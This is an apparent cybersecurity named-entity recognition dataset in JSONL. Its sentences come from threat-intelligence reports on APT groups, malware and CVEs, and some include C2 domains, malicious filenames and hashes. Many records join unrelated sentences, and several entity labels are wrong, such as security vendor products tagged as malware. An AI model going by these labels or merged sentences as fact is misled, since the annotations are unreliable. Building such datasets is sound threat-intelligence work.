{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"Organization: maritime-related": [[94, 110]], "Organization: engineering firms": [[157, 174]], "Organization: shipping": [[177, 185]], "Organization: transportation": [[190, 204]], "Organization: manufacturing": [[207, 220]], "Organization: defense": [[223, 230]], "Organization: government": [[233, 243]], "Organization: research universities": [[258, 279]], "Indicator: Vietnam.exe": [[396, 407]]}, "info": {"id": "cyberner_stix_valid_000237", "source": "cyberner_stix_valid"}}
{"text": "The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data .", "spans": {"Malware: Canhadr/Ndriver": [[221, 236]]}, "info": {"id": "cyberner_stix_valid_000238", "source": "cyberner_stix_valid"}}
{"text": "The Word document usually exploits CVE-2012-0158 . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": {"Malware: Word document": [[4, 17]], "Vulnerability: CVE-2012-0158": [[35, 48]], "Organization: Arbor": [[55, 60]], "Organization: Tibetan groups": [[176, 190]]}, "info": {"id": "cyberner_stix_valid_000239", "source": "cyberner_stix_valid"}}
{"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. certificate Figure 12 : Package name and certificate information . However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking . APT17 is a China based threat group that has conducted network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: law firms": [[436, 445]], "Organization: information technology companies": [[448, 480]], "Organization: mining companies": [[483, 499]]}, "info": {"id": "cyberner_stix_valid_000240", "source": "cyberner_stix_valid"}}
{"text": "These were instead spread using either a malicious Tor node that would trojanize legitimate applications on-the-fly with the OnionDuke toolset , or via torrent files containing previously trojanized versions of legitimate applications .", "spans": {"Malware: OnionDuke": [[125, 134]]}, "info": {"id": "cyberner_stix_valid_000241", "source": "cyberner_stix_valid"}}
{"text": "They would then use the toolset to gather initial information on the victims , before deciding which ones to pursue further .", "spans": {}, "info": {"id": "cyberner_stix_valid_000242", "source": "cyberner_stix_valid"}}
{"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": {}, "info": {"id": "cyberner_stix_valid_000243", "source": "cyberner_stix_valid"}}
{"text": "] commediauploader [ . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder ’s commands into HTML tags that the victim backdoors read . Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": {"Malware: thanks.pps": [[48, 58]], "Malware: ins8376.exe": [[122, 133]], "Malware: mpro324.dll": [[166, 177]], "System: Operating systems": [[382, 399]], "System: system files": [[464, 476]]}, "info": {"id": "cyberner_stix_valid_000244", "source": "cyberner_stix_valid"}}
{"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users . Attackers can point and click their way through a compromised network and exfiltrate data . This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"Vulnerability: ProxyNotShell": [[353, 366]]}, "info": {"id": "cyberner_stix_valid_000245", "source": "cyberner_stix_valid"}}
{"text": "Specifically , the only known infection vector for HammerDuke is to be downloaded and executed by CozyDuke onto a victim that has already been compromised by that toolset .", "spans": {"Malware: HammerDuke": [[51, 61]], "Malware: CozyDuke": [[98, 106]]}, "info": {"id": "cyberner_stix_valid_000246", "source": "cyberner_stix_valid"}}
{"text": "This particular iteration was submitted to VirusTotal on September 16 , 2016 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000247", "source": "cyberner_stix_valid"}}
{"text": "The C2 server domain is linked to Thai food : Nampriknum [ . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia . Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"Organization: critical infrastructure engineering firms": [[219, 260]], "Organization: government agencies": [[263, 282]], "Organization: financial houses": [[285, 301]], "Organization: academia": [[306, 314]], "Organization: CSP": [[511, 514]]}, "info": {"id": "cyberner_stix_valid_000248", "source": "cyberner_stix_valid"}}
{"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": {"Malware: MSIL dropper": [[148, 160]], "Malware: Javascript (JS) dropper": [[215, 238]], "Organization: think tank": [[372, 382]]}, "info": {"id": "cyberner_stix_valid_000249", "source": "cyberner_stix_valid"}}
{"text": "This new organization proposed the creation of a more secure Android phone . We were soon able to help investigate another incident involving Lurk . The malware also sets the executable file ’s attributes to “ Hidden. ” Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"System: Android": [[61, 68]], "Indicator: winhlps.exe": [[272, 283]], "Indicator: acrotry.exe": [[286, 297]], "Indicator: AcroRd32.exe": [[300, 312]], "Indicator: Updater.exe": [[315, 326]]}, "info": {"id": "cyberner_stix_valid_000250", "source": "cyberner_stix_valid"}}
{"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself .", "spans": {"Malware: RIPPER": [[134, 140]], "Organization: ATM vendors": [[211, 222]]}, "info": {"id": "cyberner_stix_valid_000251", "source": "cyberner_stix_valid"}}
{"text": "Information about travel plans and campaign scheduling could provide short-term opportunities for other intelligence operations .", "spans": {}, "info": {"id": "cyberner_stix_valid_000252", "source": "cyberner_stix_valid"}}
{"text": "The group uses spear-phishing emails to compromise its targets and infect them with malware .", "spans": {}, "info": {"id": "cyberner_stix_valid_000253", "source": "cyberner_stix_valid"}}
{"text": "As mentioned in this blog , Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000254", "source": "cyberner_stix_valid"}}
{"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related .", "spans": {"Malware: White Lambert": [[189, 202]], "Malware: Blue Lambert": [[234, 246]]}, "info": {"id": "cyberner_stix_valid_000255", "source": "cyberner_stix_valid"}}
{"text": "] comkalisi [ . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges . Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China ’s “ +86 ” international code . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"Organization: political activist": [[105, 123]], "Organization: British-Iranian": [[201, 216]]}, "info": {"id": "cyberner_stix_valid_000256", "source": "cyberner_stix_valid"}}
{"text": "This is usually done in order to validate the target of a new infection . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls . The actor used the same trick that FireEye in the Flare-On 6 : Challenge 7: They removed the header of the python bytecode . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"Malware: XLS-withyourface.xls": [[213, 233]], "Malware: XLS-withyourface – test.xls": [[238, 265]], "Organization: FireEye": [[303, 310]]}, "info": {"id": "cyberner_stix_valid_000257", "source": "cyberner_stix_valid"}}
{"text": "Additional Downeks downloaders connecting to the previously-observed server dw.downloadtesting.com were also found in this attack :", "spans": {"Malware: Downeks": [[11, 18]], "Indicator: dw.downloadtesting.com": [[76, 98]]}, "info": {"id": "cyberner_stix_valid_000258", "source": "cyberner_stix_valid"}}
{"text": "During our investigation of the campaign , we identified a number of global targets across several industries who were attacked in 2015 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000259", "source": "cyberner_stix_valid"}}
{"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000260", "source": "cyberner_stix_valid"}}
{"text": "APT28 isn’t the only group targeting travelers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000261", "source": "cyberner_stix_valid"}}
{"text": "The Blackfly attacks share some similarities with the more recent Suckfly attacks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000262", "source": "cyberner_stix_valid"}}
{"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package . Brief Description : Dot file enabling the infection of the Gamaredon Pteranodon . Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"Organization: FinFisher": [[242, 251]], "Malware: Pteranodon": [[375, 385]], "Organization: Ashley Madison ’s parent company": [[388, 420]], "Organization: Avid Life Media": [[439, 454]], "Organization: Dennis Bradshaw": [[546, 561]]}, "info": {"id": "cyberner_stix_valid_000263", "source": "cyberner_stix_valid"}}
{"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought . In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) . Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators ’ support . These frameworks are commonly delivered as part of traditional commodity malware , so infection chains can vary widely .", "spans": {"Organization: SecureWorks": [[185, 196]], "Organization: CTU": [[275, 278]]}, "info": {"id": "cyberner_stix_valid_000264", "source": "cyberner_stix_valid"}}
{"text": "] today During our investigation , we identified at least four major releases of the RAT . This migration activity was last observed in October 2016 . While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {}, "info": {"id": "cyberner_stix_valid_000265", "source": "cyberner_stix_valid"}}
{"text": "TG-3390 : ctcb.blackcmd.com .", "spans": {"Indicator: ctcb.blackcmd.com": [[10, 27]]}, "info": {"id": "cyberner_stix_valid_000266", "source": "cyberner_stix_valid"}}
{"text": "The attack began with a web shell running on a vulnerable , publicly-facing server , from which the attackers gathered information about the network and propagated across the network . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": {"Organization: labor rights advocates": [[269, 291]], "Organization: foreign policy institutions": [[313, 340]]}, "info": {"id": "cyberner_stix_valid_000267", "source": "cyberner_stix_valid"}}
{"text": "Investigation of this testing activity reveals multiple independent ties to Russia , CNIIHM , and a specific person in Moscow .", "spans": {"Organization: CNIIHM": [[85, 91]]}, "info": {"id": "cyberner_stix_valid_000268", "source": "cyberner_stix_valid"}}
{"text": "The primary difference between the CVE-2014-0515 metasploit module and this exploit is , obviously , the vulnerability .", "spans": {"Vulnerability: CVE-2014-0515": [[35, 48]]}, "info": {"id": "cyberner_stix_valid_000269", "source": "cyberner_stix_valid"}}
{"text": "Changes to Egypt ’s internal political climate are known to have affected Egyptian government relations with Hamas over the years .", "spans": {"Organization: Hamas": [[109, 114]]}, "info": {"id": "cyberner_stix_valid_000270", "source": "cyberner_stix_valid"}}
{"text": "While we know that the attackers used the Nidiran back door to steal information about the compromised organization , we do not know if Suckfly was successful in stealing other information .", "spans": {"Malware: Nidiran": [[42, 49]]}, "info": {"id": "cyberner_stix_valid_000271", "source": "cyberner_stix_valid"}}
{"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims . This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": {"Organization: Falcon Intelligence": [[151, 170]], "Indicator: rinpocheinfo.com": [[338, 354]], "Organization: emails": [[492, 498]]}, "info": {"id": "cyberner_stix_valid_000272", "source": "cyberner_stix_valid"}}
{"text": "Recently , the ThreatLabZ research team came across a fake Netflix app , which turned out to be a new variant of SpyNote RAT ( Remote Access Trojan ) . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"Organization: ThreatLabZ": [[15, 25]], "System: fake Netflix app": [[54, 70]], "Malware: SpyNote RAT": [[113, 124]], "Malware: Carbanak": [[336, 344]], "Organization: banks": [[404, 409]], "Organization: payment systems": [[416, 431]]}, "info": {"id": "cyberner_stix_valid_000273", "source": "cyberner_stix_valid"}}
{"text": "This ZeroT executable communicated with the C&C domain www.kz-info.net and downloaded PlugX as well as an additional PCRat S-VULNAME/Gh0st Trojan which communicated with the www.ruvim.net C&C server .", "spans": {"Malware: ZeroT": [[5, 10]], "Indicator: www.kz-info.net": [[55, 70]], "Malware: PlugX": [[86, 91]], "Vulnerability: PCRat S-VULNAME/Gh0st": [[117, 138]], "Malware: Trojan": [[139, 145]], "Indicator: www.ruvim.net": [[174, 187]]}, "info": {"id": "cyberner_stix_valid_000274", "source": "cyberner_stix_valid"}}
{"text": "The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000275", "source": "cyberner_stix_valid"}}
{"text": "While not directly overlapping , this potential infrastructure link is interesting , as Vixen Panda has previously displayed TTPs similar to COMMENT PANDA , and has extensively targeted European entities . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine .", "spans": {"Indicator: KopiLuwak": [[227, 236]]}, "info": {"id": "cyberner_stix_valid_000276", "source": "cyberner_stix_valid"}}
{"text": "Skygofree : Following in the footsteps of HackingTeam 16 JAN 2018 At the beginning of October 2017 , we discovered new Android spyware with several features previously unseen in the wild . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine . They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": {"Malware: Skygofree": [[0, 9]], "Organization: HackingTeam": [[42, 53]], "System: Android": [[119, 126]]}, "info": {"id": "cyberner_stix_valid_000277", "source": "cyberner_stix_valid"}}
{"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with ease . EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user’s microphone and the ability to download and execute further modules . Strings within this sample associated with the malware ’s operations are encoded using a single-byte XOR encoding .", "spans": {"System: TikTok Pro": [[80, 90]]}, "info": {"id": "cyberner_stix_valid_000278", "source": "cyberner_stix_valid"}}
{"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": {"Vulnerability: exploit": [[242, 249]], "Malware: Kaspersky Lab products": [[250, 272]]}, "info": {"id": "cyberner_stix_valid_000279", "source": "cyberner_stix_valid"}}
{"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": {"Vulnerability: CVE-2018-0798": [[0, 13]], "Organization: Lashkar-e-Taiba": [[170, 185]], "Organization: LeT": [[188, 191]]}, "info": {"id": "cyberner_stix_valid_000280", "source": "cyberner_stix_valid"}}
{"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years . The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {}, "info": {"id": "cyberner_stix_valid_000281", "source": "cyberner_stix_valid"}}
{"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": {"Malware: it": [[26, 28]], "Indicator: Zawgyi_Keyboard_L.zip": [[189, 210]], "Indicator: setup.exe": [[234, 243]], "Malware: Elise": [[304, 309]], "Indicator: wincex.dll": [[312, 322]], "Indicator: a42c966e26f3577534d03248551232f3": [[327, 359]], "Malware: Backdoor.Win32.Agent.delp": [[374, 399]]}, "info": {"id": "cyberner_stix_valid_000282", "source": "cyberner_stix_valid"}}
{"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . RCS Galileo platform .", "spans": {}, "info": {"id": "cyberner_stix_valid_000283", "source": "cyberner_stix_valid"}}
{"text": "In 2013 , there was evidence of cooperation ( most probably on a commercial basis ) between different groups of virus writers . It's possible TG-3390 used a waterhole to infect data center employees . This article focuses on the technical details of this new ShadowPad variant . Protecting your information and systems from every vantage point , including your networks , devices , applications , transmissions , privileges , and storage is critical , as is regularly training your staff on the latest cyber threats , trends , and ransomware phishing attacks .", "spans": {"Organization: data center employees": [[177, 198]], "Malware: ShadowPad": [[259, 268]]}, "info": {"id": "cyberner_stix_valid_000284", "source": "cyberner_stix_valid"}}
{"text": "The command and control domains were different , and these samples used unique decoy documents to target their victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000285", "source": "cyberner_stix_valid"}}
{"text": "Firmware is low-level code deep in an operating system that often has high access privileges , so it 's critical that it 's verified and contains no software vulnerabilities . APT10's unprecedented campaign against MSPs , alleged to have included some of the largest MSPs in the world , in order to conduct secondary attacks against their clients , grants the Chinese state the ability to potentially access the networks of hundreds (if not thousands) of corporations around the world . Minzen : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 .", "spans": {"Organization: MSPs": [[215, 219]], "Malware: Minzen": [[487, 493]], "Indicator: 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2": [[496, 560]]}, "info": {"id": "cyberner_stix_valid_000286", "source": "cyberner_stix_valid"}}
{"text": "Filename : attachedTemplate.dotm MD5 : 018611b879b2bbd886e86b62484494da Filename : templates.dotm MD5 : 2a794b55b839b3237482098957877326 .", "spans": {"Indicator: attachedTemplate.dotm": [[11, 32]], "Indicator: 018611b879b2bbd886e86b62484494da": [[39, 71]], "Indicator: templates.dotm": [[83, 97]], "Indicator: 2a794b55b839b3237482098957877326": [[104, 136]]}, "info": {"id": "cyberner_stix_valid_000287", "source": "cyberner_stix_valid"}}
{"text": "In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000288", "source": "cyberner_stix_valid"}}
{"text": "After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": {"Organization: CTU": [[70, 73]]}, "info": {"id": "cyberner_stix_valid_000289", "source": "cyberner_stix_valid"}}
{"text": "The PDF lists dates of birth , gender , passport numbers , and names . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years . The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 ’s attack systems , betrays the true location and language of the operators . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": {"Organization: Symantec": [[218, 226]]}, "info": {"id": "cyberner_stix_valid_000290", "source": "cyberner_stix_valid"}}
{"text": "for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": {"System: Android": [[4, 11]], "Organization: financial": [[246, 255]], "Malware: Carbanak": [[352, 360]], "Vulnerability: exploit": [[373, 380]], "System: Windows": [[406, 413], [419, 426], [441, 448], [457, 464], [479, 486], [491, 498], [507, 514]], "Vulnerability: CVE-2013-3660": [[529, 542]]}, "info": {"id": "cyberner_stix_valid_000291", "source": "cyberner_stix_valid"}}
{"text": "NEW CYBER ESPIONAGE CAMPAIGNS TARGETING PALESTINIANS Over the last several months , the Cybereason Nocturnus team has been tracking recent espionage campaigns targeting the Middle East .", "spans": {"Organization: Cybereason Nocturnus": [[88, 108]]}, "info": {"id": "cyberner_stix_valid_000292", "source": "cyberner_stix_valid"}}
{"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"Vulnerability: CVE-2011-3544": [[38, 51]], "Vulnerability: CVE-2010-0738": [[146, 159]], "Organization: gaming organizations": [[351, 371]]}, "info": {"id": "cyberner_stix_valid_000293", "source": "cyberner_stix_valid"}}
{"text": "The developer name used , GAS Brazil , suggests the criminals behind the app targeted Brazilian users . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": {"Vulnerability: CVE-2017-11882": [[213, 227]], "Organization: Novetta": [[410, 417]], "Organization: International Civil Aviation Organization": [[549, 590]], "Organization: ICAO": [[593, 597]]}, "info": {"id": "cyberner_stix_valid_000294", "source": "cyberner_stix_valid"}}
{"text": "These malware samples leverage the user agent string “ OPAERA ” , the same one identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"Malware: KASPERAGENT": [[139, 150]], "Malware: MICROPSIA": [[155, 164]]}, "info": {"id": "cyberner_stix_valid_000295", "source": "cyberner_stix_valid"}}
{"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it ’ s particularly challenging for mobile malware due to Android ’ s application sandbox . Russian cyber espionage actors use zero-day exploits in addition to less complex measures . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android": [[169, 176]]}, "info": {"id": "cyberner_stix_valid_000296", "source": "cyberner_stix_valid"}}
{"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java “ PBEWithMD5AndDES ” algorithm . The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": {"Malware: PowerShell": [[473, 483]]}, "info": {"id": "cyberner_stix_valid_000297", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions . In this example , the webpage that the attacker is monitoring is booking.com ( more specifically , the page containing the card details ) . They have named it Industroyer – the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": {"Organization: Kaspersky Lab": [[0, 13]], "Organization: Google": [[37, 43]], "Indicator: booking.com": [[283, 294]], "Malware: Industroyer": [[377, 388]], "System: Industrial Control Systems ( ICS": [[413, 445]]}, "info": {"id": "cyberner_stix_valid_000298", "source": "cyberner_stix_valid"}}
{"text": "Pivoting on specific file attributes and infrastructure indicators , Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"Organization: Unit 42": [[69, 76]], "Organization: government agency": [[244, 261]], "Malware: JHUHUGIT": [[268, 276]], "Vulnerability: zero-day": [[379, 387]], "Vulnerability: CVE-2015-2590": [[390, 403]]}, "info": {"id": "cyberner_stix_valid_000299", "source": "cyberner_stix_valid"}}
{"text": "In this instance , the C2 communication implemented by the Micropsia backdoor also used specific names for different C2 commands .", "spans": {"Malware: Micropsia backdoor": [[59, 77]]}, "info": {"id": "cyberner_stix_valid_000300", "source": "cyberner_stix_valid"}}
{"text": "Providing the app has registered an intent to process particular events from the system , and one of said events occurs , HenBox is effectively brought to life through external stimulus from another app on the system broadcasting a request , or the system itself broadcasting a particular event has occurred . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": {"Organization: cryptocurrency organizations": [[372, 400]], "Organization: video game targeting": [[405, 425]], "Organization: FireEye": [[446, 453]], "Organization: Russian government": [[581, 599]]}, "info": {"id": "cyberner_stix_valid_000301", "source": "cyberner_stix_valid"}}
{"text": "The coding style suggests that the cybercriminals behind this campaign are amateurs . Starting in February 2018 , Palo Alto Networks Unit 42 identified a not just goto . If passed , it would require U.S. financial institutions hit with ransomware to notify the Director of the Treasury Departments Financial Crimes Enforcement Network with details of the attack and the ransom demand .", "spans": {"Organization: Palo Alto Networks Unit 42": [[114, 140]], "Organization: U.S. financial institutions": [[199, 226]], "Malware: ransomware": [[236, 246]], "Organization: Director of the Treasury Departments Financial Crimes Enforcement Network": [[261, 334]]}, "info": {"id": "cyberner_stix_valid_000302", "source": "cyberner_stix_valid"}}
{"text": "It can also identify open ports , collect web banners , and download secondary files .", "spans": {}, "info": {"id": "cyberner_stix_valid_000303", "source": "cyberner_stix_valid"}}
{"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . 
This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"Organization: Security Without Borders": [[0, 24]], "Vulnerability: Carbanak": [[185, 193]], "Organization: defense entities": [[385, 401]]}, "info": {"id": "cyberner_stix_valid_000304", "source": "cyberner_stix_valid"}} {"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Many of the tools they use now feature new behaviors , including a change in the way they maintain a foothold in the targeted network .", "spans": {"Vulnerability: zero-day exploits": [[37, 54], [289, 306], [358, 375]]}, "info": {"id": "cyberner_stix_valid_000305", "source": "cyberner_stix_valid"}} {"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 .", "spans": {"Malware: Winnti family of malware": [[196, 220]]}, "info": {"id": "cyberner_stix_valid_000306", "source": "cyberner_stix_valid"}} {"text": "By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . 
